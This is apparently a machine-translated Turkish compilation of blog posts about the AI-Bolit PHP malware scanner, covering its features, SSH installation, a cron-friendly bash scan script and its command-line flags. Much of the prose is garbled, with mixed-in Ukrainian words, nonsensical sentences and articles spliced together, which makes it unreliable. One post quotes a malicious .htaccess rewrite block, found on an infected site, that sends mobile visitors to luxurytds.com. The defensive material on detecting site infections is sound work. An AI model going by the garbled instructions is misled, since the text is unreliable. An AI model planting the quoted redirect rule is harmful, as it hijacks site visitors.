Shell php virüs tarayıcısı. AI-Bolit, etkili bir virüs tarayıcı ve barındırma için diğer kötü amaçlı koddur. AI-Bolit tarayıcı nasıl kullanılır

Golovna / Ana işlevsellik

AI-Bolit - verimli virüs tarayıcı ve diğer kod barındırma için

Bize sık sık sorulur: AI-Bolit tarayıcı neden benzersizdir? Masaüstü antivirüslerini bulmak için maldet, clamav chi kodunu aramak için diğer benzer araçların hataları nelerdir? Kısa uyarı - PHP ve Perl'de yazılmış hatalı kodu tespit etmek daha kolaydır. Niye ya? Aşağıya bakınız.

Gün boyunca, özensiz kodlar (hacker web kabukları, arka kapılar vb.) daha karmaşık ve daraltılabilir hale gelir. Tanımlayıcıların ve şifreleme kodunun kremle gizlenmesi

Her yerde, çağrılabilir argümanlar, işleyici "ve dolaylı çağrılabilir işlevler içeren ek yöntemler için işlevlerin örtük geri çağrıları çalınmaya başlandı.

Doğrusal bir yapıya ve sabit tanımlayıcılara sahip daha az sayıda shkidlivy komut dosyası vardır. Kod maskelenmiş ve yakomoga minlivish, "polimorfik" tarafından soyulmuş

abo navpak, zrobiti mümkün olduğunca orijinal senaryoya benzer şekilde affedin.

Bazen, özensiz bir senaryoyu analiz ederken, "özensiz"i açık bir şekilde tanımlayacak bir sabitleyici parça görmek imkansızdır. Barındırma konusunda en önemli web anti-virüs ve tarayıcılarda kazandığı için, basit bir imza veritabanının (anti-virüs veritabanı) arkasında böyle kalitesiz bir kodu bilmenin imkansız olduğu açıktır. İçin etkili bir şaka modern "shkidlivih", virüs kalıplarını ve bazı durumlarda - buluşsal yöntemleri belirtmek için daha akıcı yöntemler kullanmak gerekir. Aynı pidhіd mi zastosovuєmo shkіdly AI-BOLIT kodunun tarayıcısında.
Normal virüslere dayalı geniş bir vahşi kalıp veritabanının keşfi, çok sayıda virüslü sitenin taranmasına dayanan ek bir buluşsal analizin geliştirilmesi, AI-Bolit tarayıcısının en etkili ve aktif olarak muzaffer araç olarak geliştirilmesine izin verdi. yönetici ve web dağıtıcısı.

AI-Bolit'in geniş popülaritesi, ayrıca basit arayüzün avantajını ve ticari olmayan bir yöntemle ücretsiz konuşma imkanını da ortadan kaldırdı. Herhangi bir web yöneticisi, AI-Bolit'i http://revisium.com/ai/ resmi sitesinden tamamen ücretsiz olarak indirebilir ve kaynağınızı bilgisayar korsanlarının kabuklarını, arka kapıları, kapıları, virüsleri, spam-spam-spam'lerini, ek mesajlarını ve diğerlerini ortaya çıkarmak için dönüştürebilir. shkidlivih parçaları ve ekler. Tarayıcı ayrıca, müşteri sitelerini incelemek ve eşleştirmek için ticari şirketler - web stüdyoları, barındırma şirketleri ve İnternet ajansları tarafından da aktif olarak incelenir. Barındırıcılar AI-Bolit'i kontrol paneline entegre eder, web tarayıcıları yanlış kodu aramak için ve site izlemenin ana bilgisayar hizmetlerinde yogo kullanır.

Aşağıda, Ai-Bolit tarayıcının yeteneklerinin yalnızca küçük bir benzerliğine işaret ediyoruz:

  • tarayıcı konsolundan başlat
  • üç tarama modu ("basit", "uzman", "paranoyak") ve iki robotik mod ("ekspres" ve "harici tarama")
  • Hacker php ve perl betikleri (kabuklar, arka kapılar), virüs eklentileri, kapılar, spam-rozilachiv, mesaj satışı için betikler, gizleme betikleri ve diğer shkidlivih betikleri için arama yapın. Modelleri ve normal virazları aramanın yanı sıra, potansiyel olarak inişli çıkışlı kodu belirlemek için buluşsal yöntemleri kullanma
  • Şifrelenmiş, parçalanmış imzaları arayın metin blokları ve onaltılı/ekim/aralık kodlamaları
  • poshuk şüpheli dosyalar shkіdlivih komut dosyalarına takılabilen yapılarla
  • dosya eklerini ara
  • sembolik mesajlar için arama
  • Arama motorunun ve mobil yönlendirmelerin kodunu ve diğerlerini arayın.
Konuşmadan önce, yazarın RosPatent'ten Ai-Bolit'teki sertifikası alındı. Tarayıcı ayrıca üçüncü taraf sitelerde, özel dergilerde, konferanslarda ve web seminerlerinde aktif olarak görüntülenir.

Senaryonun resmi tarafı

Siteleri oluşturan şarkı söyleyen deri, siteye virüs ve truva atları ile yapışır. İlk sorun, projeler itme sistemleri veya barındırıcının yükü (DDoS, spam için) şeklinde karamsarlığı biriktiriyorsa, sorunu bir an önce azaltmaktır.

Sitede Windows altında makinede bir saatlik büyük yedekleme varsa, Qia makalesi hemen yazılmalıdır. ESET Akıllı Güvenlik raptomu, sanki vvazhav vіrusnyakom gibi resimlere havlamaya başladı. Sitedeki resimlerin yardımıyla FilesMan arka kapısının sular altında kaldığı ortaya çıktı.

Dira bula, betiğin siteye yeniden yazarak resimlerin yakalanmasına izin vermesiydi, böylece resim sadece dosyayı genişleterek yakalanacaktı. Vmіst değil perevіryavsya zovsіm. Yani çalışmanıza gerek yok ;) Ne olursa olsun sitedeki sonuçlardan faydalanılabilir. php dosyası resmin altında. Ale, dirklerle ilgili değil ...

Sitedeki tüm dosyaların virüs ve truva atları için doğrulanmasından sorumlu olanları öğrenin.

Siteyi çevrimiçi olarak virüslere karşı kontrol etme

İnternetteki virüs sitelerinin her türlü çevirileri bu tür zovsim kelimeleri için uygun değildir. Çevrimiçi tarayıcılar, şaka yapan bir robot gibi davranır, sırayla her şeyi gözden geçirir mevcut taraflar alan. Site tarafına taşınmak sitenin diğer taraflarından gelen taleplere tabidir. cevap bir kötü niyetli olarak, sitenin hiçbir yerinde o resme gönderilen bir resmin ek yardımı için siteye bir arka kapı gönderiyor, ancak site tahrif edilemiyor, bu yüzden bir virüs nasıl yan tarafa asılır, o zamanlar çevrimiçi inceleme virüsteki site sadece resimleri bilmiyor ve virüs bilmiyor.

Navischo'ya soruyorsun, kötü adam çok mu soyuldu? Arka kapıyı su basıp hiçbir şey yapmamaya ne dersin? Vidpovim - spam için, ddosu için. Diğer ağır aktiviteler için sitenin kenarlarında görünmez.

Tek kelimeyle, bir virüsteki bir sitenin çevrimiçi incelemesi, tam bir gönül rahatlığı için kesinlikle marnadır.

WordPress sitesini virüslere ve truva atlarına karşı kontrol etmek için eklenti

WordPress için bir anti-virüs eklentisi vardır. Şarap denir. Siteyi virüslerden temizleyerek FilesMan'den resimler bilmek harika bir his var. Ale vin maє önemli nedolіk. Şarapları yeniden kontrol etmenin ilk saati, sunucuya vahşi bir bağlantı sağlar, böylece tüm dosyaları sıralarsınız. Ayrıca, kutudan yeniden kontrol etme işlemi yalnızca elle yapılabilir. Eklenti ile bir sitenin yeniden doğrulanmasını otomatikleştirmek mümkün değildir.

Eh, WordPress kullanmak mümkün, evrensel olmak gerekiyor.

Web sitesini en iyi antivirüs ile kontrol etme

Söylendiği gibi, daha fazla sorun ve bir saatlik yedekleme için en güçlü masaüstü antivirüs tarafından vipadkovo ortaya çıktı. Tüm siteyi ele geçirmek ve en iyi antivirüs ile kontrol etmek mümkündür. Her şey tamamen pratik.

  • İlk olarak, otomasyon istiyorum. Schob reverka bula içinde otomatik mod ve pіdbags için buv hazır svіt.
  • farklı bir şekilde, bunlar çocukların derilerini iten siteler sadece gerçek değil,

AI-Bolit'i deneyin

Schos іz intro sıkın. Tüm aramalar sonucunda harikalar biliniyor CİLTSİZ antivirüs site için. Tsey antivirüs, farklı yoga şemalarında kullanılabilir. Vikoristav'ı ssh üzerinden yogo yapıyorum.

Chi, paylaşılan barındırmada yogo vikoristovuvati olabilir - bilmeden, ama bence bu mümkün. AI-Bolit php ile yazılmıştır ve bir tarayıcıdan başlatılabilir. Buna tamamen teknik olarak - tek tek, paylaşımlı olarak mümkündür.

Önemli! Aibolit virüsler için iyi bir site değil - sizin için şaraplar Vin dosyaları güvenli olmadığı için bir arama yapın. Ve neden onlarla kendin çalışıyorsun? Bunun için, aptalca düğmeye tıklamanız yeterlidir ve Truva atlarından sitede kaybolmazsınız.

Ssh'den VDS'de AI-Bolit nasıl edinilir

Aibolite, hangi antivirüsün seçileceğine ilişkin talimatlara ve ana sınıflara sahiptir. Sıra basit:

  • indirmek
  • sunucuya paketinden çıkardım (/root/ai'den paketini açtım)
  • ssh konsolundan php /root/ai/ai-bolit/ai-bolit.php dosyasını çalıştırın
  • yeniden kontrol, siteye göre bayat bir şekilde bir yıl sürebilir
  • yeniden doğrulama alt torbaları için, AI-BOLIT-REPORT- çağrısıyla bir dosya oluşturulacaktır.<дата>-<время>.html

Ses dosyasında sorunlu dosyalar göreceksiniz, bu yüzden kokular var.

Sunucuya büyük ilgi

Asıl sorun, sitenin virüs üzerinde otomatik olarak yeniden doğrulanmasına bağlı kalmasıdır - sunucuya ulaşmaya çalışmanın maliyeti. Tüm anti-virüsler aynı anda çalışır ve mevcut tüm dosyaları sırayla sıralar. І aibolit burada suç yok. Vin tüm dosyaları alır ve sırayla yeniden doğrular. Fikir yavaş ve uzun zaman alabilir, bu da üretim için hoş değildir.

Ale, aibolitin çılgın bir yeteneği var (aklınız için, tam bir sunucunuz veya kök erişimi olan bir VDS'niz var). Bir aibolit için yeniden doğrulama için bir dosya listesi oluşturabilir ve ardından bir liste oluşturabilirsiniz. Todi aibolit bu listeyi gözden geçirin.

Listenin oluşumu için sunucunun herhangi bir aracı ile hızlandırabilirsiniz. Aşağıdaki bash betiğine sahibim:

# bash /root/ai/run.sh # https://revisium.com/kb/ai-bolit-console-faq.html DOMAIN="web sitesi" AI_PATH="/root/ai" ŞİMDİ=$(tarih +" %F-%k-%M-%S") # şifre erişimi altında bir ortak klasör oluşturabilirsiniz REPORT_PATH="$AI_PATH/reports/$DOMAIN-$NOW.html" SCAN_PATH="/home/azzrael/web/$ DOMAIN/ public_html/" SCAN_DAYS=90 #php /home/admin/ai/ai-bolit/ai-bolit.php --mode=1 --path=$SCAN_PATH --report=$REPORT_PATH # Yalnızca X günlük değişiklik dosyalarını tarayın # AI-BOLIT-DOUBLECHECK.php, aibolit'in yazarı tarafından --with-2check !!! find $SCAN_PATH -type f -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" #find $SCAN_PATH -type f -name "*.ph*" -ctime -$SCAN_DAYS > " $AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" #find $SCAN_PATH -type f -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" #find $SCAN_PATH -type f -name "*.ph*" -o -name "*.gif" -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" php "$AI_PATH/ai-bolit/ai -bolit.php" --mode=1 --report=$REPORT_PATH --with-2check #history -c

# bash /root/ai/run.sh

# https://revisium.com/kb/ai-bolit-console-faq.html

ALAN = "site"

AI_PATH = "/root/ai"

ŞİMDİ = $(tarih + "%F-%k-%M-%S")

# şifre erişimi altında bir ortak klasör oluşturabilirsiniz

REPORT_PATH= "$AI_PATH/raporlar/$DOMAIN-$NOW.html"

SCAN_PATH= "/home/azzrael/web/$DOMAIN/public_html/"

SCAN_DAYS = 90

#php /home/admin/ai/ai-bolit/ai-bolit.php --mode=1 --path=$SCAN_PATH --report=$REPORT_PATH

php "$AI_PATH/ai-bolit/ai-bolit.php"-- mod = 1 -- rapor = $REPORT_PATH -- ile - 2kontrol

#tarih -c

Burada, find komutu aracılığıyla, SCAN_DAYS'in geri kalanı için oluşturulan tüm dosyaları seçtiğimizi, bunları AI-BOLIT-DOUBLECHECK.php listesine seçtiğimizi görebilirsiniz (spіvzh'den önce. Dosyayı, mutabakat anında listeye yeniden adlandırın , mümkün değildi), o zaman tüm aibolite listesini oluşturacağız. SCAN_DAYS bir güne eşit olabilir. Bash /root/ai/run.sh dosyasını güzel bir cron'a koyarsanız, kontrol edilecek dosyaların listesi çok büyük olmayabilir. cevap krediyi yeniden kontrol etmek yeterli zaman değil ve sunucu çok meşgul değil.

Sitelerinize virüs bulaşmadığından emin misiniz? Siteyi çevrimiçi antivirüs programında kontrol ettiniz mi? Unutmayın, çevrimiçi anti-virüsler akıllı bilgisayar korsanları tarafından sitenize dikilen virüsleri asla bilemezler.

Kokunun yapabileceği maksimum değer, sitenize yanlışlıkla yüklediğiniz shkidli komut dosyalarını belirlemektir. Bu yüzden siteyi bir virüs üzerinde yeniden kontrol etmek için radikal yöntemlere ihtiyacınız var, böylece sadece tepeleri atlamakla kalmayıp projenizin ortasına da bakabilirsiniz.

Bir site ücretli ve ücretsiz olarak nasıl virüse dönüştürülür?

Bu yazıda sitenizi virüse dönüştürmenin bir dekilka yolu anlatılacaktır:

Çevrimiçi antivirüsler - en basit, ancak tüm yardımı ve en iyi yolu.

Antivirus Aibolit - en iyi ve en uygun yol.

Web sitesi antivirüs virüs günü - En iyi seçenek.

Sitede güvensiz virüs olanlar hakkında biraz.

Site neden güvenli değil?

Ale koçanı üzerinde bir teori üçlüsü özel sertifika- beni bir kereden fazla lamali. Bir siteye virüs nasıl bulaşır? Siteye erişim sağladıktan sonra, saldırganlar şu adımları atabilir:

Trafiğinizi projelerinize çekmeye başlayın.
Üçüncü şahıslara satılık Zavantazhuyut sunucusu ve temel veriler.
Sitedeki iletişim ve ödeme bilgilerini değiştirin, muhabirin kişisel bilgilerini isteyin.
Spam mesajları olan kapıları sitenize dağıtın.
Virüsleri, truva atlarını veya istismarları sitenin yan tarafına geçirerek onlara bulaşmak.
Sunucunuzdan spam harcayın.
Düşük seviyeli yetkisiz penetrasyon için kötü amaçlı siteye erişimi diğer saldırganlara sat.

Anlamak önemlidir: virüslü siteler yaptırımlara tabi olabilir poshukovyh sistemleri ve vtratiti pozisyonları. Hostingim, bilgisayar korsanları tarafından bir kereden fazla bombalandı ve yenisine saldırdı. Neden rahatsız? Amaç banal: şifrelerinize erişiminizi ortadan kaldırın veya kodun öfkesi yoluyla sitenize bir virüs enjekte edin.

Sanırım, web sitelerinden onlarla dolup taşan iki kız gördüm. Ale tse pіv bіdi, sitelerimin bundan sonra infіkovanі olduğu gerçeğine ve şifreler arasında gezinme bu konuda çok az. Ve her şeyin tekrar olmayacağının garantisi yok.

Potim, adresi tekrar girersem siteye ve o numaradaki admin paneline giriyorum. Ne cüretkar bir şey, bilmiyorum. Bu sitede benim dinlenmem, böyle bir şey yok. bu yüzden pid DDOS saldırıları Henüz içine girmedim….

Siteyi kötülemenin en kolay yolu, her şeyi girip komut dosyasını siteye tekrar yüklemektir.. Ale senin anladığın gibi aşırı zahid gibi sadece aşırı bir depresyona girmek gerekiyor. Aynı kodu bir şablona dikebilirsiniz, ancak değiştirmeyeceksiniz. Bu nedenle, koçan için sitemizin hangi enfeksiyonlara sahip olduğunu bulmaya çalışmak gerekli mi? Nasıl robiti?

Bir siteyi çevrimiçi olarak bir virüse döndürmek mi?

Bir siteyi çevrimiçi olarak bir virüste yeniden kontrol etmek - bu yöntem yukarıda yazdığım gibi en etkili değilse, yenisinden başlayabilirsiniz. Є uygunsuz hizmet Antivirüs Alarmı .

Sadece sitenin adresini girin ve servis sitenizi virüslere karşı yeniden kontrol edene kadar kontrol edin. Hatayı biliyorsan, ondan şüphelenmişsindir, o zaman onu yıldızlarda görebilirsin. Ancak çevrimiçi antivirüsünüz hakkında hiçbir şey bilmiyorsanız, daha fazlasını deneyin ve bir çözüm bulun.

Bir siteyi bir komut dosyasıyla virüse nasıl dönüştürebilirim?

Kelimenin tam anlamıyla aynı gün, tüm sitelerimi antivirüs Aibolit ile kontrol ettim ve ana enfeksiyon sitemi ortaya çıkardım.

Antivirüs nedir ve nasıl kullanılır?

Bu antivirüsü satıcının web sitesinden edinebilirsiniz. aibolit . Şu anda, Windows için bir sürüm var, daha önce bunu barındırma yoluyla yapmak mümkündü.

Site için antivirüs ne olabilir? Eksen ne:

- barındırma ile ilgili şaka virüsleri, shkidlivy ve hacker komut dosyaları: imzalar ve hata desenleri için kabuklar, beceriksiz buluşsal yöntemlere dayalı kabuklar - tüm bunlar bariz - antivirüsler ve tarayıcılar bilemez.
- şaka rastgele komut dosyaları timthumb, fckeditor, uploadify, vb.
- Shukati, shkіdlі sitelerinde .htaccess'e yönlendiriyor.
- Shukati kodu uygulanabilir değiş tokuşlar.php dosyalarında sape/trustlink/linkfeed/… gibi
- dizinleri ve dosya girişlerini seçin.
- Şablonlarda Shukati boş mesajlar (görünmez mesajlar).
- Dizinleri göster, girişi aç.
- Bizimle suçlamadan cms çalışın (joomla, wordpress, drupal, dle, bitrix, phpbb, ...)
— e-posta ile arama yapın veya dosyayı kaydedin.

Kurulum basittir: arşivleri açın ve ai-bolit klasöründen ai-bolit.php, .aignore, .aurlignore dosyalarını sitemizin bulunduğu klasöre ve CMS'mizin sürümüyle eşleşen bilinen_files klasöründeki dosyayı yükleyin. , benim durumumda tse.aknown.wp_3_8 Wordpress . Belki de, örneğin 755 dosyalarında doğru izinleri ayarlamanız gerekecektir.

Peki, doğru hostinge sahip olanlar için terminale gitmeniz (Linux'um var, herhangi bir emülatöre ihtiyacı yok) ve SSH üzerinden hostingimize bağlanmanız gerekiyor.

Ssh LOGIN@SERVER_ADDRESS

Nasıl emin olabilirim, açıklamayacağım, eğer doğru yerde değilseniz, o zaman burada gerekli bireysel pidkhid, yorumlara yazın, açıklayacağım.

Bağlantıdan sonra site ile klasöre ek cd komutları için gitmek gerekiyor. Komutu veriyoruz:

php ai-bolit.php

Tarama netleşirse, uzun süre silmek gibi olur, siteye bakmak ücretsizdir. Tamamlandıktan sonra, sitenin bulunduğu klasörde belirli bir ada sahip bir dosya görünecektir. AI-BOLIT-RAPORU-07-04-2014_23-10-719945.html

Dosyayı açın ve ne olduğunu analiz edin. Örneğin, koçanın kendisinde gördüm:

Kabuk komut dosyası imzası bulundu. shk_dlivy komut dosyasında P_dozra: (12)

Ancak sadece bir virüsün olduğu ve kaydın şifrelenmesine benzer şekilde sertifikanın üzerinde mühür olduğu doğru çıktı.

Buradan başlamanın en kolay yolu temiz bir WordPress almaktır, aksi halde orada ne var ve yanlışları kontrol edin. Orijinalinde olduğu gibi, her şey aynı, o zaman övünmeye gerek yok. Ve değilse, bir shkidlivy kodu görebilirsiniz. Dali'ye havladım:

Podvіyne razshirennya, shkіdlivy komut dosyasında içerik chi pіdozra şifreleme. Gerekli ek analiz: (14)

Bir eklentide Layavsya antivirüs - TOP 10 - şaşmamalı, sorun bu. Ayrıca, diğer nebezpeki boule pardon spratsovuvannyam.

Sezgisel analiz wordpress dosyalarına havladı, ama orijinallere baktım ve her şey yolundaydı.

Bu dosyalara görünmez bir mesaj yerleştirilmiştir. Uygun spam şüphesi:

Burada YUKARI düğmesini oluşturan bir eklentiyim - yeni Bulo'da mesaj eklendi.

Burada bazı eklentiler istiyorsanız, içlerinde her şeyin güçlü olabileceğinin farkında olmalısınız. Ale tse virishuєtsya ilköğretim, klasörü endeksleme şeklinde eklentilerle kapatın. Wordpress'te robot.txt dosyasına bir satır girerek robot yapabilirsiniz. İzin verme: /wp-content/plugins

Bir cilt tipi için her şey daha bireysel olacaktır, bu nedenle daha spesifik yazmak önemlidir. Birinin yön vermesi için meta stat daha büyüktür.

Burada her şey iyi olurdu, tek bir şey almıyor - sürekli izleme. Antivirüsünüzü bugün başlatmayacaksınız ve bilgisayar korsanları tatil yapmadan çalışacak. Ve burada başka bir harika hizmet bize yardımcı olacak. Site sitesi hizmeti nasıl yeniden doğrulanır?

Bir virüs üzerinde sitenin otomatik olarak yeniden kontrol edilmesi

Son zamanlarda ortaya çıkan hizmet virüs günü , siteyi virüslerin varlığı için kalıcı olarak izleyebilir. Her şeyin daha tanıdık ve işlevsel olduğunu görünce, sitelerin virüs şeklindeki taşkınlığı burada en iyisidir:


Sitenizi bunlara eklemek ve sitenin kök dizinine yüklenen bir php senkronizasyon dosyası almak gereklidir. Ardından, sitenizi bir virüse dönüştürmek için senkronizasyon ve hizmetleri çalıştırabilirsiniz.

AT ücretsiz sürümçevrenin fizibilitesi, çünkü siteniz sizin için değerlidir, o zaman bir troch ödeyebilir ve huzur içinde uyuyabilirsiniz - hizmetin kendisi virüsü kapatacak ve hemen sevinecektir.

Eksen, bir sitede virüs tespit edildi. Bu site, yayınlanan yayının protokolünü virubav yapana kadar sunucumda vandalizmden suçludur. Sorun ortaya çıktı, ancak virüs kaybetti:

Peki, enfeksiyonu görmeye çalışalım. Nі, burada bu bulo değil, hizmet virüsü ücretsiz olarak görmek istemiyor, yalnızca bu tür bilgileri gördü:

Bulunan tehditler:h.HariciYönlendirme
WEB sunucusu yapılandırma dosyası, sitenin akıllıca veya delice bir şekilde üçüncü taraf bir kaynağa nasıl yönlendirileceğine ilişkin talimatlar içerir. görmeniz tavsiye edilir.

Sitede tespit ettiğim virüsü nasıl tespit edebilirim? Elden öğrenmeye çalışacağım ya da belki ücretli bir tarifeye abone olacağım, site güvenlik ekranları çok önemli. Her şey için daha iyisini istiyorum, paylaşılan barındırmadan hangi enfeksiyonu getirdim, şimdi resmi VPS ve özel bir sorun yoktu. otze, Virusdai'ye kaydolun ve sitenizi bağlayın.

Sitenizi virüs açısından kontrol edebileceğiniz için, daha fazla yol biliyorsanız ve qi için daha hızlı bulursanız, herkes onları bilir.

Dün iyi bir resepsiyon almadım - tüm sitelerime bulaştılar. Güzel, bilgisayar başındayım ve bir keresinde sorundan bahsetmiştim. Ne oldu?

Bir sitem, bir tanışma sitesine, müstehcen bir siteye, hafifçe kazhuchi'ye geçmek için bir raptom haline geldi. Etki alanıma gittiğinizde, sizi tüm spam yapan siteye yönlendirir.

Durum daha da kötüyse, sorunu hemen çözmezseniz, onu suçlayabilirsiniz. Ve yakscho tse trivatime dovgo, o zaman dürtme sistemleri sitenize bir filtre koyabilir ve tüm pozisyonları bir aramaya koyabilirsiniz.

Bunlar hakkında zaten bir şeyler yazdım, ama bu özel tipe swidko virüsünü bilmek gerekiyordu. Hemen shkіdlivy kodunu manuel olarak açacağım.

Yönlendirme diğer taraftan gittiğinden, başlığa (header.php) bir betik yerleştirildiğini veya bırakıldığını (footer.php) düşündüm. Ale, üçüncü taraf kodu yoktu.

Barındırma için hemen destek servisiyle iletişime geçtim:

- Sorunu çözmeye yardımcı olmak için müstehcen bir kaynağa yönlendirilen böyle bir sitem var.

Ale, kendim de tahmin ettiğim gibi, kokumu ele geçirmedi, başka nereye hayret etmem gerekiyordu. Sitenin kök dizininde bulunan .htaccess dosyasında aşağıdaki kodu gösterdim:

RewriteBase / RewriteCond'da RewriteEngine %(HTTP_USER_AGENT) android|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|pad)|iris|kindle|lge | mobile|midp|mmp|netfront|palm(os)?|telefon|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up. wafone|wap|windows (ce|phone)|xda|xiino RewriteCond %(HTTP_USER_AGENT) )|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu| ar(ch|go)|as(te|us)|attw|au(di |-m|r |s)|avan|be(ck|ll|nq)| )|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob |(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze) | fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p) |t)|hei-|hi(pt|ta)|hp(i|ip)|hs-c|ht(c(-| aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro |jemu|jigs|kddi|keji|kgt (|/)|klon|kpt | kwc-|kyo(c|k)|le(no|xi)|lg(g|/(k|l|u)|50|54|-)|libw|lynx| m1-w|m3ga|m50/| ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef |mo(01|02|bi| de|do|t(-| |o|v)|zz)|mt(50|p1|v)|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)| n7(0(0|1)) |10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph| a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt- g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma| mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar| sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v) |sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)| |to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750| (40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-|)|webc|whit|wi( g |nc|nw)|wmlb|wonu|x700|yas-|sizin|zeto|zte-) RewriteRule ^$ _http://luxurytds.com/go.php?sid=1 # BULLETPROOF .50.8 >>>>> >> GÜVENLİ .HTACCESS

Yogayı öğrenir öğrenmez her şey gerektiği gibi işlemeye başladı. Her şey için 5 dakikam var. Ale yakby benim yerimde yeni bir acemiydi, sonra yenisinde birkaç saat içebilirdim, yakbi vin sorunu kendisi anlamaya başladı.

Kendi başıma, tüm sitelerime benzer bir rütbenin bulaştığını ortaya çıkardım. Sorunu çözdüm ve barındırma desteğine yazdım:

Tüm sitelerime virüs bulaştı, o zaman hostinginizdeki her şeye bulaştılar, insanların önüne geçmek kötü olmaz.

Bula ne dedi:

Yalnızca sitelerinizin dosyaları "enfekte". Böyle bir sıralamada, bazı siteleriniz için tutarsızlık var, örneğin eğik kayıttaki dosyaları değiştirmek için kazandılar. Şaka yapmak için internet bayisine gitmeniz ve bu saçmalıkları yakalamanız gerekiyor.

O kadar yanlış olmayabilir. Barındırma sistemimdeki sitelerime virüs bulaşırsa yapılacak ilk şey bu değil. Tüm web yöneticilerinin sorunları aynı değil mi? Hostingimde neler var?

Bu ilk hosting değil ve hiçbir yerde böyle sorunlar yaşamadım. Dedalі daha fazla schilyayu schob değişiklik barındırmadan önce, örneğin CEY.

Bir teknik destek bana diğer sitemin spam yaydığını yazdığı için bu sorunu çözmedim. Sonuç olarak, bir eklenti içeren bir klasöre üçüncü taraf bir php dosyası yükledim ve bunun üzerinden spam gönderildi.

Tüm dosyayı kaldırdım ve sorun çözüldü. WordPress'in aynı Windows'ta olduğuna dair net bir izlenimim var ve scho cim robiti?

AI-BOLIT tarayıcıyı modunda çalıştırırken mevcut olan en büyük işlevsellik Komut satırı. Windows/Unix/Mac OS X gibi ve aracı barındırma olmadan çalışmak mümkündür, çünkü SSH'ye erişiminiz vardır ve barındırma işlemci kaynaklarını büyük ölçüde azaltmaz.

Tarayıcıyı çalıştırmak için PHP 7.1 veya daha yüksek bir konsol sürümüne ihtiyacınız olduğunu lütfen unutmayın. Daha erken sürümler resmi olarak desteklenmiyorlar. Tersi şimdiki versiyonu php -v komutu

AI-BOLIT tarayıcının komut satırı parametrelerinin ayarlanması

Yardımı göster

php ai-bolit.php --help

php ai-bolit.php --skip=jpg,png,gif,jpeg,JPG,PNG,GIF,bmp,xml,zip,rar,css,avi,mov

Yalnızca bir uzantıyı tarayın

php ai-bolit.php --scan=php,php5,pht,phtml,pl,cgi,htaccess,şüpheli,tpl

Fakhivtsy'nin güvenliği için bir karantina dosyası hazırlayın. AI-QUARANTINE-XXXX.zip arşivi bir şifre ile oluşturulacaktır.

php ai-bolit.php --karantina

Tarayıcıyı "paranoyak" modda çalıştırın (en ayrıntılı sesi yakalamak için önerilir)

php ai-bolit.php --mode=2

php ai-bolit.php --mode=1

Bir "pms.db" dosyasını rastgele bir koda dönüştürün

php ai-bolit.php-jpms.db

Tarayıcıyı 512 Mb bellek alanından çalıştırın

php ai-bolit.php --memory=512M

Maksimum dosya boyutunu 900Kb olarak ayarlayın

php ai-bolit.php --size=900K

Robiti, taramanın her saatinde dosyalar arasında 500 ms duraklar (yükü azaltmak için)

php ai-bolit.php --delay=500

E-postaya tarama hakkında bir mesaj gönderin [e-posta korumalı]

php ai-bolit.php [e-posta korumalı]

/home/scanned/report_site1.html dosyasından bir çağrı oluşturun

php ai-bolit.php --report=/home/scanned/report_site1.html

/home/s/site1/public_html/ dizinini tarayın (--report=file_html seçeneği ayarlanmadığından kilitleme bağlantısı bu dizinde oluşturulacaktır)

php ai-bolit.php --path=/home/s/site1/public_html/

Tarama tamamlandıktan sonra Vikonati komutu.

php ai-bolit.php --cmd="~/postprocess.sh"

Adı metin görünümünden (düz metin) site1.txt adından kaldırın

php ai-bolit.php-lsite1.txt

Örneğin, dzvinki'yi birleştirebilirsiniz,

php ai-bolit.php --size=300K --path=/home/s/site1/public_html/ --mode=2 --scan=php,phtml,pht,php5,pl,cgi,şüpheli

AI-BOLIT tarayıcı wiki'sini diğer unix komutlarıyla birleştirerek, örneğin siteleri toplu olarak tarayabilirsiniz. Aşağıda, bir dizi sitenin, eğik kaydın ortasındaki yerleşimlerin yeniden doğrulanması konusunda rehberlik edeceğiz. Örneğin, site /var/www/user1/data/www dizininin ortasında barındırılıyorsa, tarayıcıyı başlatma komutu şu şekilde olacaktır:

find /var/www/user1/data/www -maxdepth 1 -type d -exec php ai-bolit.php --path=() --mode=2 \;

--report parametresini ekleyerek, tarama hakkında bir çağrı alacak dizini kontrol edebilirsiniz.

php ai-bolit.php parametre listesi ... --tur

Arayüzü İngilizce'ye çevirin. Tsey parametresi durabiliriz.

Diğer hizmetlerle ve barındırma paneline entegrasyon

php ai-bolit.php --json_report=/path/file.json

json formatında bir ses oluşturun

php ai-bolit.php --progress=/path/progress.json

